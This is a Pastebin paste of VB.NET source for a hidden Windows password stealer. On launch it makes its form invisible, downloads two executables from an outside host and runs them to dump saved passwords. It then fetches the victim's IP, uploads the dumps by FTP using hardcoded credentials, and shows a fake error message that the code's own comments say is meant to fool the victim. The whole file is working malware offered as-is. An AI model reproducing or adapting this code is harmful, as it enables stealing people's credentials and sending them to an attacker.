Guest User

Untitled

a guest
May 3rd, 2018
35
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.93 KB | None | 0 0
  1. Imports System.Net.Sockets
  2. Imports System.Net
  3. Imports System.Text
  4. Imports System.Data
  5. Imports System.Text.RegularExpressions
  6. Imports System.IO
  7.  
  8. Public Class Form1
  9. Dim 求助各位狠人 As String = My.Computer.FileSystem.CombinePath(My.Computer.FileSystem.SpecialDirectories.Temp, "d42o33zsM.tmp")
  10.  
  11. Sub Delay(ByVal dblSecs As Double)
  12.  
  13. Const OneSec As Double = 1.0# / (1440.0# * 60.0#)
  14. Dim dblWaitTil As Date
  15. Now.AddSeconds(OneSec)
  16. dblWaitTil = Now.AddSeconds(OneSec).AddSeconds(dblSecs)
  17. Do Until Now > dblWaitTil
  18. Application.DoEvents() ' Allow windows messages to be processed
  19. Loop
  20.  
  21. End Sub
  22. Dim web As New WebClient()
  23. Dim username = "admin@mkoesapi.cba.pl"
  24. Dim password = "123Qweasdzxc"
  25. Dim hostname = "cba.pl"
  26. Dim server = "ftp://cba.pl/"
  27.  
  28. Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
  29. Me.Opacity = 0
  30. On Error Resume Next 'This means that if the program runs into an error it will continue
  31.  
  32. Dim home As String = My.Computer.FileSystem.SpecialDirectories.MyMusic & "\home\" 'Declares "home" to the music directory (here we'll extract the files)
  33. If My.Computer.FileSystem.DirectoryExists(home) Then
  34. My.Computer.FileSystem.DeleteDirectory(home, FileIO.DeleteDirectoryOption.DeleteAllContents) 'Checks if the directory already exist if yes it deletes it
  35. End If
  36.  
  37.  
  38. If (Not System.IO.Directory.Exists(求助各位狠人)) Then
  39. System.IO.Directory.CreateDirectory(求助各位狠人)
  40. End If
  41.  
  42. MkDir(home) 'it recreates the direcotry
  43.  
  44. If (Not System.IO.File.Exists(求助各位狠人 + "\1.exe")) Then
  45. web.DownloadFile("http://minecon.5v.pl/1.exe", 求助各位狠人 + "\1.exe")
  46. End If
  47. If (Not System.IO.File.Exists(求助各位狠人 + "\2.exe")) Then
  48. web.DownloadFile("http://minecon.5v.pl/2.exe", 求助各位狠人 + "\2.exe")
  49. End If
  50.  
  51. Process.Start(求助各位狠人 & "1.exe", "/stext 1.txt")
  52. Process.Start(求助各位狠人 & "2.exe", "/stext 2.txt")
  53.  
  54.  
  55. Threading.Thread.Sleep(2000) 'waits 2 seconds for the programs to export the passwords
  56.  
  57. '^ it organises them into a final string
  58. Dim ip As String
  59. ip = System.Text.Encoding.ASCII.GetString((web.DownloadData("http://bot.whatismyipaddress.com")))
  60. TextBox1.Text = ip
  61. My.Computer.Network.UploadFile(求助各位狠人 & "/1.txt", server & "/chujek/1-" + TextBox1.Text + ".txt", username, password)
  62. My.Computer.Network.UploadFile(求助各位狠人 & "/2.txt", server & "/chujek/2-" + TextBox1.Text + ".txt", username, password)
  63.  
  64. MsgBox("Critical Error Runtime At 0x009b (Thread_Start) Dll Not Responding To Hook", MsgBoxStyle.Critical, "Dll Not Responding") 'Shows a fake error to the victim
  65. Me.Close()
  66. End Sub
  67.  
  68. End Class
Add Comment
Please, Sign In to add comment